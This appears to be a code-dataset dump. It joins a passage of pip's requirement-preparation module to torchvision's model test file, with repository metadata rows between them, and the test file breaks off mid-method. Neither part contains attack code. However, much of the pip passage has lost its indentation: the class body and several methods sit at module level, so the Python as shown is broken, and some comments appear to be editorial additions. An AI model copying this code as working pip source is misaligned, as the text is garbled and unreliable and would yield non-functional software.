from pip._internal.utils.hashes import MissingHashes
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
display_path,
hide_url,
path_to_display,
rmtree,
)
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.utils.unpacking import unpack_file
from pip._internal.vcs import vcs
if MYPY_CHECK_RUNNING:
from typing import Callable, Dict, Iterable, List, Optional, Tuple
from mypy_extensions import TypedDict
from pip._vendor.pkg_resources import Distribution
from pip._internal.index.package_finder import PackageFinder
from pip._internal.models.link import Link
from pip._internal.network.session import PipSession
from pip._internal.req.req_install import InstallRequirement
from pip._internal.req.req_tracker import RequirementTracker
from pip._internal.utils.hashes import Hashes
if PY2:
CopytreeKwargs = TypedDict(
'CopytreeKwargs',
{
'ignore': Callable[[str, List[str]], List[str]],
'symlinks': bool,
},
total=False,
)
else:
CopytreeKwargs = TypedDict(
'CopytreeKwargs',
{
'copy_function': Callable[[str, str], None],
'ignore': Callable[[str, List[str]], List[str]],
'ignore_dangling_symlinks': bool,
'symlinks': bool,
},
total=False,
)
logger = logging.getLogger(__name__)
def _get_prepared_distribution(
    req,  # type: InstallRequirement
    req_tracker,  # type: RequirementTracker
    finder,  # type: PackageFinder
    build_isolation,  # type: bool
):
    # type: (...) -> Distribution
    """Prepare a distribution for installation.

    Builds the requirement's metadata and returns the resulting
    pkg_resources Distribution.
    """
    # Pick the concrete distribution wrapper (sdist/wheel/installed) for req.
    abstract_dist = make_distribution_for_install_requirement(req)
    # NOTE(review): the tracker context presumably guards against recursive
    # metadata builds — confirm in req_tracker.
    with req_tracker.track(req):
        abstract_dist.prepare_distribution_metadata(finder, build_isolation)
    return abstract_dist.get_pkg_resources_distribution()
def unpack_vcs_link(link, location):
    # type: (Link, str) -> None
    """Check out the repository behind a VCS *link* into *location*."""
    vcs_backend = vcs.get_backend_for_scheme(link.scheme)
    # Callers only pass VCS links, so a backend must exist for the scheme.
    assert vcs_backend is not None
    # hide_url keeps credentials embedded in the URL out of logs.
    vcs_backend.unpack(location, url=hide_url(link.url))
class File(object):
    """A local archive path paired with its MIME content type.

    When no content type is supplied, one is inferred from the file name.
    """

    def __init__(self, path, content_type):
        # type: (str, Optional[str]) -> None
        self.path = path
        self.content_type = (
            mimetypes.guess_type(path)[0]
            if content_type is None
            else content_type
        )
def get_http_url(
    link,  # type: Link
    download,  # type: Downloader
    download_dir=None,  # type: Optional[str]
    hashes=None,  # type: Optional[Hashes]
):
    # type: (...) -> File
    """Fetch the archive behind an http(s) *link*, reusing a previously
    downloaded copy from *download_dir* when present and hash-valid.
    """
    temp_dir = TempDirectory(kind="unpack", globally_managed=True)
    # If a download dir is specified, is the file already downloaded there?
    already_downloaded_path = None
    if download_dir:
        already_downloaded_path = _check_download_dir(
            link, download_dir, hashes
        )

    if already_downloaded_path:
        from_path = already_downloaded_path
        # Unknown for reused files; File() will infer from the name.
        content_type = None
    else:
        # let's download to a tmp dir
        from_path, content_type = download(link, temp_dir.path)

    # Verify the file against the expected hashes, if any were given.
    if hashes:
        hashes.check_against_path(from_path)

    return File(from_path, content_type)
def _copy2_ignoring_special_files(src, dest):
    # type: (str, str) -> None
    """Copy *src* to *dest*, downgrading special-file errors to warnings.

    Special files (e.g. sockets that dev tooling leaves in a source tree)
    cannot be copied; rather than aborting the whole tree copy, log the
    problem and continue.
    """
    try:
        copy2_fixed(src, dest)
    except shutil.SpecialFileError as exc:
        # The error could concern either endpoint, but the destination
        # directory is deleted before copying starts, so treat the source
        # as the special file and skip it.
        logger.warning(
            "Ignoring special file error '%s' encountered copying %s to %s.",
            str(exc),
            path_to_display(src),
            path_to_display(dest),
        )
def _copy_source_tree(source, target):
    # type: (str, str) -> None
    """Recursively copy a local project directory into *target*, skipping
    top-level tox/nox environments and guarding against copying the target
    into itself.
    """
    target_abspath = os.path.abspath(target)
    target_basename = os.path.basename(target_abspath)
    target_dirname = os.path.dirname(target_abspath)

    def ignore(d, names):
        # type: (str, List[str]) -> List[str]
        skipped = []  # type: List[str]
        if d == source:
            # Pulling in those directories can potentially be very slow,
            # exclude the following directories if they appear in the top
            # level dir (and only it).
            # See discussion at https://github.com/pypa/pip/pull/6770
            skipped += ['.tox', '.nox']
        if os.path.abspath(d) == target_dirname:
            # Prevent an infinite recursion if the target is in source.
            # This can happen when TMPDIR is set to ${PWD}/...
            # and we copy PWD to TMPDIR.
            skipped += [target_basename]
        return skipped

    kwargs = dict(ignore=ignore, symlinks=True)  # type: CopytreeKwargs

    if not PY2:
        # Python 2 does not support copy_function, so we only ignore
        # errors on special file copy in Python 3.
        kwargs['copy_function'] = _copy2_ignoring_special_files

    shutil.copytree(source, target, **kwargs)
def get_file_url(
    link,  # type: Link
    download_dir=None,  # type: Optional[str]
    hashes=None  # type: Optional[Hashes]
):
    # type: (...) -> File
    """Get file and optionally check its hash.

    Prefers a previously downloaded copy in *download_dir* over the
    link's own file path.
    """
    # If a download dir is specified, is the file already there and valid?
    already_downloaded_path = None
    if download_dir:
        already_downloaded_path = _check_download_dir(
            link, download_dir, hashes
        )

    if already_downloaded_path:
        from_path = already_downloaded_path
    else:
        from_path = link.file_path

    # If --require-hashes is off, `hashes` is either empty, the
    # link's embedded hash, or MissingHashes; it is required to
    # match. If --require-hashes is on, we are satisfied by any
    # hash in `hashes` matching: a URL-based or an option-based
    # one; no internet-sourced hash will be in `hashes`.
    if hashes:
        hashes.check_against_path(from_path)

    # Content type is left None; File infers it from the file name.
    return File(from_path, None)
def unpack_url(
    link,  # type: Link
    location,  # type: str
    download,  # type: Downloader
    download_dir=None,  # type: Optional[str]
    hashes=None,  # type: Optional[Hashes]
):
    # type: (...) -> Optional[File]
    """Unpack link into location, downloading if required.

    Returns the still-packed archive as a ``File`` for file/http links,
    or ``None`` for VCS checkouts and local directories (nothing to keep).

    :param hashes: A Hashes object, one of whose embedded hashes must match,
        or HashMismatch will be raised. If the Hashes is empty, no matches are
        required, and unhashable types of requirements (like VCS ones, which
        would ordinarily raise HashUnsupported) are allowed.
    """
    # non-editable vcs urls
    if link.is_vcs:
        unpack_vcs_link(link, location)
        return None

    # If it's a url to a local directory
    if link.is_existing_dir():
        if os.path.isdir(location):
            rmtree(location)
        _copy_source_tree(link.file_path, location)
        return None

    # file urls
    if link.is_file:
        file = get_file_url(link, download_dir, hashes=hashes)

    # http urls
    else:
        file = get_http_url(
            link,
            download,
            download_dir,
            hashes=hashes,
        )

    # unpack the archive to the build dir location. even when only downloading
    # archives, they have to be unpacked to parse dependencies, except wheels
    if not link.is_wheel:
        unpack_file(file.path, location, file.content_type)

    return file
def _check_download_dir(link, download_dir, hashes):
# type: (Link, str, Optional[Hashes]) -> Optional[str]
""" Check download_dir for previously downloaded file with correct hash
If a correct file is found return its path else None
"""
download_path = os.path.join(download_dir, link.filename)
if not os.path.exists(download_path):
return None
# If already downloaded, does its hash match?
logger.info('File was already downloaded %s', download_path)
if hashes:
try:
hashes.check_against_path(download_path)
except HashMismatch:
logger.warning(
'Previously-downloaded file %s has bad hash. '
'Re-downloading.',
download_path
)
os.unlink(download_path)
return None
return download_path
class RequirementPreparer(object):
"""Prepares a Requirement
"""
def __init__(
self,
build_dir, # type: str
download_dir, # type: Optional[str]
src_dir, # type: str
wheel_download_dir, # type: Optional[str]
build_isolation, # type: bool
req_tracker, # type: RequirementTracker
session, # type: PipSession
progress_bar, # type: str
finder, # type: PackageFinder
require_hashes, # type: bool
use_user_site, # type: bool
lazy_wheel, # type: bool
):
# type: (...) -> None
super(RequirementPreparer, self).__init__()
self.src_dir = src_dir
self.build_dir = build_dir
self.req_tracker = req_tracker
self._session = session
self._download = Downloader(session, progress_bar)
self._batch_download = BatchDownloader(session, progress_bar)
self.finder = finder
# Where still-packed archives should be written to. If None, they are
# not saved, and are deleted immediately after unpacking.
self.download_dir = download_dir
# Where still-packed .whl files should be written to. If None, they are
# written to the download_dir parameter. Separate to download_dir to
# permit only keeping wheel archives for pip wheel.
self.wheel_download_dir = wheel_download_dir
# NOTE
# download_dir and wheel_download_dir overlap semantically and may
# be combined if we're willing to have non-wheel archives present in
# the wheelhouse output by 'pip wheel'.
# Is build isolation allowed?
self.build_isolation = build_isolation
# Should hash-checking be required?
self.require_hashes = require_hashes
# Should install in user site-packages?
self.use_user_site = use_user_site
# Should wheels be downloaded lazily?
self.use_lazy_wheel = lazy_wheel
# Memoized downloaded files, as mapping of url: (path, mime type)
self._downloaded = {} # type: Dict[str, Tuple[str, str]]
# Previous "header" printed for a link-based InstallRequirement
self._previous_requirement_header = ("", "")
@property
def _download_should_save(self):
    # type: () -> bool
    """Whether downloaded archives should be kept in ``self.download_dir``.

    Raises InstallationError when a download dir was requested but does
    not exist or cannot be accessed.
    """
    if not self.download_dir:
        return False

    if os.path.exists(self.download_dir):
        return True

    logger.critical('Could not find download directory')
    raise InstallationError(
        "Could not find or access download directory '{}'"
        .format(self.download_dir))
def _log_preparing_link(self, req):
# type: (InstallRequirement) -> None
"""Provide context for the requirement being prepared."""
if req.link.is_file and not req.original_link_is_in_wheel_cache:
message = "Processing %s"
information = str(display_path(req.link.file_path))
else:
message = "Collecting %s"
information = str(req.req or req)
if (message, information) != self._previous_requirement_header:
self._previous_requirement_header = (message, information)
logger.info(message, information)
if req.original_link_is_in_wheel_cache:
with indent_log():
logger.info("Using cached %s", req.link.filename)
def _get_download_dir(self, link):
    # type: (Link) -> Optional[str]
    """Directory to save *link*'s archive in, or None to discard it."""
    if link.is_wheel and self.wheel_download_dir:
        # Download wheels to a dedicated dir when doing `pip wheel`.
        return self.wheel_download_dir
    return self.download_dir
def _ensure_link_req_src_dir(self, req, download_dir, parallel_builds):
    # type: (InstallRequirement, Optional[str], bool) -> None
    """Ensure source_dir of a linked InstallRequirement.

    Allocates an auto-deleted build directory for non-wheel links and
    refuses to reuse a leftover build directory from a failed run.
    """
    # Since source_dir is only set for editable requirements.
    if req.link.is_wheel:
        # We don't need to unpack wheels, so no need for a source
        # directory.
        return
    assert req.source_dir is None
    # We always delete unpacked sdists after pip runs.
    req.ensure_has_source_dir(
        self.build_dir,
        autodelete=True,
        parallel_builds=parallel_builds,
    )

    # If a checkout exists, it's unwise to keep going. version
    # inconsistencies are logged later, but do not fail the
    # installation.
    # FIXME: this won't upgrade when there's an existing
    # package unpacked in `req.source_dir`
    if os.path.exists(os.path.join(req.source_dir, 'setup.py')):
        # FIX: the original message concatenated to "due to apre-existing"
        # (missing trailing space) and contained "failed ." — corrected.
        raise PreviousBuildDirError(
            "pip can't proceed with requirements '{}' due to a "
            "pre-existing build directory ({}). This is likely "
            "due to a previous installation that failed. pip is "
            "being responsible and not assuming it can delete this. "
            "Please delete it and try again.".format(req, req.source_dir)
        )
def _get_linked_req_hashes(self, req):
# type: (InstallRequirement) -> Hashes
# By the time this is called, the requirement's link should have
# been checked so we can tell what kind of requirements req is
# and raise some more informative errors than otherwise.
# (For example, we can raise VcsHashUnsupported for a VCS URL
# rather than HashMissing.)
if not self.require_hashes:
return req.hashes(trust_internet=True)
# We could check these first 2 conditions inside unpack_url
# and save repetition of conditions, but then we would
# report less-useful error messages for unhashable
# requirements, complaining that there's no hash provided.
if req.link.is_vcs:
raise VcsHashUnsupported()
if req.link.is_existing_dir():
raise DirectoryUrlHashUnsupported()
# Unpinned packages are asking for trouble when a new version
# is uploaded. This isn't a security check, but it saves users
# a surprising hash mismatch in the future.
# file:/// URLs aren't pinnable, so don't complain about them
# not being pinned.
if req.original_link is None and not req.is_pinned:
raise HashUnpinned()
# If known-good hashes are missing for this requirement,
# shim it with a facade object that will provoke hash
# computation and then raise a HashMissing exception
# showing the user what the hash should be.
return req.hashes(trust_internet=False) or MissingHashes()
def _fetch_metadata_using_lazy_wheel(self, link):
    # type: (Link) -> Optional[Distribution]
    """Fetch metadata using lazy wheel, if possible.

    Returns None whenever lazy fetching is disabled or inapplicable
    (hash checking is on, the link is a local file or not a wheel), or
    when the server does not support HTTP range requests.
    """
    if not self.use_lazy_wheel:
        return None
    if self.require_hashes:
        logger.debug('Lazy wheel is not used as hash checking is required')
        return None
    if link.is_file or not link.is_wheel:
        # FIX: log message grammar ("does not points to" -> "does not point to").
        logger.debug(
            'Lazy wheel is not used as '
            '%r does not point to a remote wheel',
            link,
        )
        return None

    wheel = Wheel(link.filename)
    name = canonicalize_name(wheel.name)
    logger.info(
        'Obtaining dependency information from %s %s',
        name, wheel.version,
    )
    # Strip the URL fragment (e.g. #sha256=...) before the range request.
    url = link.url.split('#', 1)[0]
    try:
        return dist_from_wheel_url(name, url, self._session)
    except HTTPRangeRequestUnsupported:
        logger.debug('%s does not support range requests', url)
        return None
def prepare_linked_requirement(self, req, parallel_builds=False):
# type: (InstallRequirement, bool) -> Distribution
"""Prepare a requirement to be obtained from req.link."""
assert req.link
link = req.link
self._log_preparing_link(req)
with indent_log():
wheel_dist = self._fetch_metadata_using_lazy_wheel(link)
if wheel_dist is not None:
req.needs_more_preparation = True
return wheel_dist
return self._prepare_linked_requirement(req, parallel_builds)
    def prepare_linked_requirements_more(self, reqs, parallel_builds=False):
        # type: (Iterable[InstallRequirement], bool) -> None
        """Prepare a linked requirement more, if needed.

        Finishes the preparation of requirements whose metadata came from
        the lazy-wheel shortcut: missing archives are downloaded in one
        batch, then each requirement is fully prepared.
        """
        # Only requirements flagged by prepare_linked_requirement need work.
        reqs = [req for req in reqs if req.needs_more_preparation]
        links = []  # type: List[Link]
        for req in reqs:
            download_dir = self._get_download_dir(req.link)
            if download_dir is not None:
                # A hash-valid file already in download_dir lets us skip
                # the network round-trip for this requirement.
                hashes = self._get_linked_req_hashes(req)
                file_path = _check_download_dir(req.link, download_dir, hashes)
            # NOTE: when download_dir is None the short-circuit below keeps
            # the possibly-unbound file_path from being evaluated.
            if download_dir is None or file_path is None:
                links.append(req.link)
            else:
                self._downloaded[req.link.url] = file_path, None
        # Let's download to a temporary directory.
        tmpdir = TempDirectory(kind="unpack", globally_managed=True).path
        self._downloaded.update(self._batch_download(links, tmpdir))
        for req in reqs:
            self._prepare_linked_requirement(req, parallel_builds)
    def _prepare_linked_requirement(self, req, parallel_builds):
        # type: (InstallRequirement, bool) -> Distribution
        """Download/unpack a linked requirement and build its distribution.

        Uses a previously batch-downloaded file when available (see
        prepare_linked_requirements_more), otherwise unpacks from the
        link; optionally saves a copy into the download directory.
        """
        assert req.link
        link = req.link
        download_dir = self._get_download_dir(link)
        self._ensure_link_req_src_dir(req, download_dir, parallel_builds)
        hashes = self._get_linked_req_hashes(req)
        if link.url not in self._downloaded:
            try:
                local_file = unpack_url(
                    link, req.source_dir, self._download,
                    download_dir, hashes,
                )
            except NetworkConnectionError as exc:
                raise InstallationError(
                    'Could not install requirement {} because of HTTP '
                    'error {} for URL {}'.format(req, exc, link)
                )
        else:
            # File was fetched earlier; verify the hash before trusting it.
            file_path, content_type = self._downloaded[link.url]
            if hashes:
                hashes.check_against_path(file_path)
            local_file = File(file_path, content_type)
        # For use in later processing,
        # preserve the file path on the requirement.
        if local_file:
            req.local_file_path = local_file.path
        dist = _get_prepared_distribution(
            req, self.req_tracker, self.finder, self.build_isolation,
        )
        if download_dir:
            if link.is_existing_dir():
                logger.info('Link is a directory, ignoring download_dir')
            elif local_file:
                # Persist a copy so future runs can reuse it.
                download_location = os.path.join(download_dir, link.filename)
                if not os.path.exists(download_location):
                    shutil.copy(local_file.path, download_location)
                    download_path = display_path(download_location)
                    logger.info('Saved %s', download_path)
        if self._download_should_save:
            # Make a .zip of the source_dir we already created.
            if link.is_vcs:
                req.archive(self.download_dir)
        return dist
def prepare_editable_requirement(
self,
req, # type: InstallRequirement
):
# type: (...) -> Distribution
"""Prepare an editable requirement
"""
assert req.editable, "cannot prepare a non-editable req as editable"
logger.info('Obtaining %s', req)
with indent_log():
if self.require_hashes:
raise InstallationError(
'The editable requirement {} cannot be installed when '
'requiring hashes, because there is no single file to '
'hash.'.format(req)
)
req.ensure_has_source_dir(self.src_dir)
req.update_editable(not self._download_should_save)
dist = _get_prepared_distribution(
req, self.req_tracker, self.finder, self.build_isolation,
)
if self._download_should_save:
req.archive(self.download_dir)
req.check_if_exists(self.use_user_site)
return dist
def prepare_installed_requirement(
self,
req, # type: InstallRequirement
skip_reason # type: str
):
# type: (...) -> Distribution
"""Prepare an already-installed requirement
"""
assert req.satisfied_by, "req should have been satisfied but isn't"
assert skip_reason is not None, (
"did not get skip reason skipped but req.satisfied_by "
"is set to {}".format(req.satisfied_by)
)
logger.info(
'Requirement %s: %s (%s)',
skip_reason, req, req.satisfied_by.version
)
with indent_log():
if self.require_hashes:
logger.debug(
'Since it is already installed, we are trusting this '
'package without checking its hash. To ensure a '
'completely repeatable environment, install into an '
'empty virtualenv.'
)
return InstalledDistribution(req).get_pkg_resources_distribution()
| 36.677165
| 79
| 0.633791
|
acff816852b738b5f80913ad40982a2c818ad38d
| 17,100
|
py
|
Python
|
test/test_models.py
|
robohouse-delft/torchvision
|
1fe1e110677ab22f8512293987939d31916b7a8b
|
[
"BSD-3-Clause"
] | 1
|
2020-10-26T08:53:51.000Z
|
2020-10-26T08:53:51.000Z
|
test/test_models.py
|
robohouse-delft/torchvision
|
1fe1e110677ab22f8512293987939d31916b7a8b
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_models.py
|
robohouse-delft/torchvision
|
1fe1e110677ab22f8512293987939d31916b7a8b
|
[
"BSD-3-Clause"
] | 1
|
2020-12-27T03:45:56.000Z
|
2020-12-27T03:45:56.000Z
|
from common_utils import TestCase, map_nested_tensor_object, freeze_rng_state
from collections import OrderedDict
from itertools import product
import torch
import torch.nn as nn
import numpy as np
from torchvision import models
import unittest
import traceback
import random
def set_rng_seed(seed):
    """Seed the torch, stdlib-random and numpy RNGs for reproducible tests."""
    for seeder in (torch.manual_seed, random.seed, np.random.seed):
        seeder(seed)
def _public_factory_names(namespace):
    # Shared filter used by all get_available_*_models helpers below:
    # public (no leading "_"), lowercase-initial callables in the module.
    return [
        k for k, v in namespace.__dict__.items()
        if callable(v) and k[0].lower() == k[0] and k[0] != "_"
    ]
def get_available_classification_models():
    """Return names of public classification model factories."""
    # TODO add a registration mechanism to torchvision.models
    return _public_factory_names(models)
def get_available_segmentation_models():
    """Return names of public segmentation model factories."""
    # TODO add a registration mechanism to torchvision.models
    return _public_factory_names(models.segmentation)
def get_available_detection_models():
    """Return names of public detection model factories."""
    # TODO add a registration mechanism to torchvision.models
    return _public_factory_names(models.detection)
def get_available_video_models():
    """Return names of public video model factories."""
    # TODO add a registration mechanism to torchvision.models
    return _public_factory_names(models.video)
# models that are in torch hub, as well as r3d_18. we tried testing all models
# but the test was too slow. not included are detection models, because
# they are not yet supported in JIT.
# If 'unwrapper' is provided it will be called with the script model outputs
# before they are compared to the eager model outputs. This is useful if the
# model outputs are different between TorchScript / Eager mode
# Maps model name -> per-model TorchScript options (see ModelTester.checkModule).
script_test_models = {
    'deeplabv3_resnet50': {},
    'deeplabv3_resnet101': {},
    'mobilenet_v2': {},
    'resnext50_32x4d': {},
    'fcn_resnet50': {},
    'fcn_resnet101': {},
    'googlenet': {
        # GoogLeNet returns a namedtuple in eager mode; compare logits only.
        'unwrapper': lambda x: x.logits
    },
    'densenet121': {},
    'resnet18': {},
    'alexnet': {},
    'shufflenet_v2_x1_0': {},
    'squeezenet1_0': {},
    'vgg11': {},
    'inception_v3': {
        'unwrapper': lambda x: x.logits
    },
    'r3d_18': {},
    "fasterrcnn_resnet50_fpn": {
        # Detection models script to a (losses, detections) pair;
        # keep only the detections for comparison.
        'unwrapper': lambda x: x[1]
    },
    "maskrcnn_resnet50_fpn": {
        'unwrapper': lambda x: x[1]
    },
    "keypointrcnn_resnet50_fpn": {
        'unwrapper': lambda x: x[1]
    },
    "retinanet_resnet50_fpn": {
        'unwrapper': lambda x: x[1]
    }
}
# The following models exhibit flaky numerics under autocast in _test_*_model harnesses.
# This may be caused by the harness environment (e.g. num classes, input initialization
# via torch.rand), and does not prove autocast is unsuitable when training with real data
# (autocast has been used successfully with real data for some of these models).
# TODO: investigate why autocast numerics are flaky in the harnesses.
#
# For the following models, _test_*_model harnesses skip numerical checks on outputs when
# trying autocast. However, they still try an autocasted forward pass, so they still ensure
# autocast coverage suffices to prevent dtype errors in each model.
autocast_flaky_numerics = (
    "fasterrcnn_resnet50_fpn",
    "inception_v3",
    "keypointrcnn_resnet50_fpn",
    "maskrcnn_resnet50_fpn",
    "resnet101",
    "resnet152",
    "wide_resnet101_2",
    "retinanet_resnet50_fpn",
)
class ModelTester(TestCase):
    """Smoke/regression tests for torchvision model factories.

    The per-model ``test_<model>_<device>`` methods are attached
    dynamically at import time by the loops at the bottom of this file.
    """
    def checkModule(self, model, name, args):
        # Only script-check models listed in script_test_models; the
        # optional 'unwrapper' normalizes scripted outputs before comparison.
        if name not in script_test_models:
            return
        unwrapper = script_test_models[name].get('unwrapper', None)
        return super(ModelTester, self).checkModule(model, args, unwrapper=unwrapper, skip=False)
    def _test_classification_model(self, name, input_shape, dev):
        """Forward a random batch through a classification model and check
        expected values, output width, and TorchScript parity."""
        set_rng_seed(0)
        # passing num_class equal to a number other than 1000 helps in making the test
        # more enforcing in nature
        model = models.__dict__[name](num_classes=50)
        model.eval().to(device=dev)
        # RNG always on CPU, to ensure x in cuda tests is bitwise identical to x in cpu tests
        x = torch.rand(input_shape).to(device=dev)
        out = model(x)
        self.assertExpected(out.cpu(), prec=0.1, strip_suffix="_" + dev)
        self.assertEqual(out.shape[-1], 50)
        self.checkModule(model, name, (x,))
        if dev == "cuda":
            with torch.cuda.amp.autocast():
                out = model(x)
                # See autocast_flaky_numerics comment at top of file.
                if name not in autocast_flaky_numerics:
                    self.assertExpected(out.cpu(), prec=0.1, strip_suffix="_" + dev)
                self.assertEqual(out.shape[-1], 50)
    def _test_segmentation_model(self, name, dev):
        """Check output shape (and autocast pass) for a segmentation model."""
        # passing num_class equal to a number other than 1000 helps in making the test
        # more enforcing in nature
        model = models.segmentation.__dict__[name](num_classes=50, pretrained_backbone=False)
        model.eval().to(device=dev)
        input_shape = (1, 3, 300, 300)
        # RNG always on CPU, to ensure x in cuda tests is bitwise identical to x in cpu tests
        x = torch.rand(input_shape).to(device=dev)
        out = model(x)
        self.assertEqual(tuple(out["out"].shape), (1, 50, 300, 300))
        self.checkModule(model, name, (x,))
        if dev == "cuda":
            with torch.cuda.amp.autocast():
                out = model(x)
                self.assertEqual(tuple(out["out"].shape), (1, 50, 300, 300))
    def _test_detection_model(self, name, dev):
        """Run a detection model, compare (subsampled) outputs to expected
        values, and verify TorchScript parity of boxes/scores/labels."""
        set_rng_seed(0)
        kwargs = {}
        if "retinanet" in name:
            # Lower the detection threshold so some boxes survive the
            # randomly-initialized network.
            kwargs["score_thresh"] = 0.013
        model = models.detection.__dict__[name](num_classes=50, pretrained_backbone=False, **kwargs)
        model.eval().to(device=dev)
        input_shape = (3, 300, 300)
        # RNG always on CPU, to ensure x in cuda tests is bitwise identical to x in cpu tests
        x = torch.rand(input_shape).to(device=dev)
        model_input = [x]
        out = model(model_input)
        self.assertIs(model_input[0], x)
        def check_out(out):
            self.assertEqual(len(out), 1)
            def subsample_tensor(tensor):
                # Keep ~20 evenly spaced elements so expected files stay small.
                num_elems = tensor.numel()
                num_samples = 20
                if num_elems <= num_samples:
                    return tensor
                flat_tensor = tensor.flatten()
                ith_index = num_elems // num_samples
                return flat_tensor[ith_index - 1::ith_index]
            def compute_mean_std(tensor):
                # can't compute mean of integral tensor
                tensor = tensor.to(torch.double)
                mean = torch.mean(tensor)
                std = torch.std(tensor)
                return {"mean": mean, "std": std}
            if name == "maskrcnn_resnet50_fpn":
                # maskrcnn_resnet_50_fpn numerically unstable across platforms, so for now
                # compare results with mean and std
                test_value = map_nested_tensor_object(out, tensor_map_fn=compute_mean_std)
                # mean values are small, use large prec
                self.assertExpected(test_value, prec=.01, strip_suffix="_" + dev)
            else:
                self.assertExpected(map_nested_tensor_object(out, tensor_map_fn=subsample_tensor),
                                    prec=0.01,
                                    strip_suffix="_" + dev)
        check_out(out)
        scripted_model = torch.jit.script(model)
        scripted_model.eval()
        # Scripted detection models return (losses, detections); take [1].
        scripted_out = scripted_model(model_input)[1]
        self.assertEqual(scripted_out[0]["boxes"], out[0]["boxes"])
        self.assertEqual(scripted_out[0]["scores"], out[0]["scores"])
        # labels currently float in script: need to investigate (though same result)
        self.assertEqual(scripted_out[0]["labels"].to(dtype=torch.long), out[0]["labels"])
        self.assertTrue("boxes" in out[0])
        self.assertTrue("scores" in out[0])
        self.assertTrue("labels" in out[0])
        # don't check script because we are compiling it here:
        # TODO: refactor tests
        # self.check_script(model, name)
        self.checkModule(model, name, ([x],))
        if dev == "cuda":
            with torch.cuda.amp.autocast():
                out = model(model_input)
                # See autocast_flaky_numerics comment at top of file.
                if name not in autocast_flaky_numerics:
                    check_out(out)
    def _test_detection_model_validation(self, name):
        """Verify detection models reject missing/malformed/degenerate targets."""
        set_rng_seed(0)
        model = models.detection.__dict__[name](num_classes=50, pretrained_backbone=False)
        input_shape = (3, 300, 300)
        x = [torch.rand(input_shape)]
        # validate that targets are present in training
        self.assertRaises(ValueError, model, x)
        # validate type
        targets = [{'boxes': 0.}]
        self.assertRaises(ValueError, model, x, targets=targets)
        # validate boxes shape
        for boxes in (torch.rand((4,)), torch.rand((1, 5))):
            targets = [{'boxes': boxes}]
            self.assertRaises(ValueError, model, x, targets=targets)
        # validate that no degenerate boxes are present
        boxes = torch.tensor([[1, 3, 1, 4], [2, 4, 3, 4]])
        targets = [{'boxes': boxes}]
        self.assertRaises(ValueError, model, x, targets=targets)
    def _test_video_model(self, name, dev):
        """Check output width (and autocast pass) for a video model."""
        # the default input shape is
        # bs * num_channels * clip_len * h *w
        input_shape = (1, 3, 4, 112, 112)
        # test both basicblock and Bottleneck
        model = models.video.__dict__[name](num_classes=50)
        model.eval().to(device=dev)
        # RNG always on CPU, to ensure x in cuda tests is bitwise identical to x in cpu tests
        x = torch.rand(input_shape).to(device=dev)
        out = model(x)
        self.checkModule(model, name, (x,))
        self.assertEqual(out.shape[-1], 50)
        if dev == "cuda":
            with torch.cuda.amp.autocast():
                out = model(x)
                self.assertEqual(out.shape[-1], 50)
    def _make_sliced_model(self, model, stop_layer):
        """Return a Sequential of model's children up to and including stop_layer."""
        layers = OrderedDict()
        for name, layer in model.named_children():
            layers[name] = layer
            if name == stop_layer:
                break
        new_model = torch.nn.Sequential(layers)
        return new_model
    def test_memory_efficient_densenet(self):
        """Memory-efficient and plain densenets must agree numerically."""
        input_shape = (1, 3, 300, 300)
        x = torch.rand(input_shape)
        for name in ['densenet121', 'densenet169', 'densenet201', 'densenet161']:
            model1 = models.__dict__[name](num_classes=50, memory_efficient=True)
            params = model1.state_dict()
            num_params = sum([x.numel() for x in model1.parameters()])
            model1.eval()
            out1 = model1(x)
            out1.sum().backward()
            num_grad = sum([x.grad.numel() for x in model1.parameters() if x.grad is not None])
            model2 = models.__dict__[name](num_classes=50, memory_efficient=False)
            model2.load_state_dict(params)
            model2.eval()
            out2 = model2(x)
            max_diff = (out1 - out2).abs().max()
            # every parameter must have received a gradient
            self.assertTrue(num_params == num_grad)
            self.assertTrue(max_diff < 1e-5)
    def test_resnet_dilation(self):
        """Each dilated stage halves the downsampling factor of layer4 output."""
        # TODO improve tests to also check that each layer has the right dimensionality
        for i in product([False, True], [False, True], [False, True]):
            model = models.__dict__["resnet50"](replace_stride_with_dilation=i)
            model = self._make_sliced_model(model, stop_layer="layer4")
            model.eval()
            x = torch.rand(1, 3, 224, 224)
            out = model(x)
            f = 2 ** sum(i)
            self.assertEqual(out.shape, (1, 2048, 7 * f, 7 * f))
    def test_mobilenetv2_residual_setting(self):
        """mobilenet_v2 accepts a custom inverted_residual_setting."""
        model = models.__dict__["mobilenet_v2"](inverted_residual_setting=[[1, 16, 1, 1], [6, 24, 2, 2]])
        model.eval()
        x = torch.rand(1, 3, 224, 224)
        out = model(x)
        self.assertEqual(out.shape[-1], 1000)
    def test_mobilenetv2_norm_layer(self):
        """A custom norm_layer replaces every BatchNorm2d in mobilenet_v2."""
        model = models.__dict__["mobilenet_v2"]()
        self.assertTrue(any(isinstance(x, nn.BatchNorm2d) for x in model.modules()))
        def get_gn(num_channels):
            return nn.GroupNorm(32, num_channels)
        model = models.__dict__["mobilenet_v2"](norm_layer=get_gn)
        self.assertFalse(any(isinstance(x, nn.BatchNorm2d) for x in model.modules()))
        self.assertTrue(any(isinstance(x, nn.GroupNorm) for x in model.modules()))
    def test_fasterrcnn_double(self):
        """Faster R-CNN must run end-to-end in float64."""
        model = models.detection.fasterrcnn_resnet50_fpn(num_classes=50, pretrained_backbone=False)
        model.double()
        model.eval()
        input_shape = (3, 300, 300)
        x = torch.rand(input_shape, dtype=torch.float64)
        model_input = [x]
        out = model(model_input)
        self.assertIs(model_input[0], x)
        self.assertEqual(len(out), 1)
        self.assertTrue("boxes" in out[0])
        self.assertTrue("scores" in out[0])
        self.assertTrue("labels" in out[0])
    def test_googlenet_eval(self):
        """Scripting a pretrained googlenet in eval mode should round-trip."""
        m = torch.jit.script(models.googlenet(pretrained=True).eval())
        # NOTE(review): checkModule's `args` parameter is a tuple elsewhere
        # in this file; a bare tensor is passed here — confirm intended.
        self.checkModule(m, "googlenet", torch.rand(1, 3, 224, 224))
    @unittest.skipIf(not torch.cuda.is_available(), 'needs GPU')
    def test_fasterrcnn_switch_devices(self):
        """Model must produce valid outputs on CUDA, under autocast, and
        again after being moved back to CPU."""
        def checkOut(out):
            self.assertEqual(len(out), 1)
            self.assertTrue("boxes" in out[0])
            self.assertTrue("scores" in out[0])
            self.assertTrue("labels" in out[0])
